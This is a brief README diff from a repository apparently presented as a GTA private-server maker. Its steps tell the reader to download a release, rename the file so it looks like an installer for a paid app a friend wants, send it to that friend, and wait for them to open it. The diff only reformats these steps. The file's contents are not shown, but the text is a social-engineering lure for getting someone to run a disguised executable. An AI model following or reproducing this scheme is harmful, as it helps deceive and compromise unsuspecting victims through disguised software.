OfficialYeet638/Best-Private-server-Maker-GTA/README.md

 1. Go to Release, download the latest version

-2. Since the name maybe suspicious, so after download it, change the name to something else.
-For example, if your friend want some paid apps but he can't buy it at this moment, then name it to "xxxx_installer" (where xxxx is the app name).
+2. Since the name maybe suspicious, so after download it, ***change the filename to something else***.
+For example, if your friend want some paid apps but he can't buy it at this moment, then name it to "*xxxx_installer*" (where *xxxx* is the app name).

 3. Send it to him/her and wait for him to open!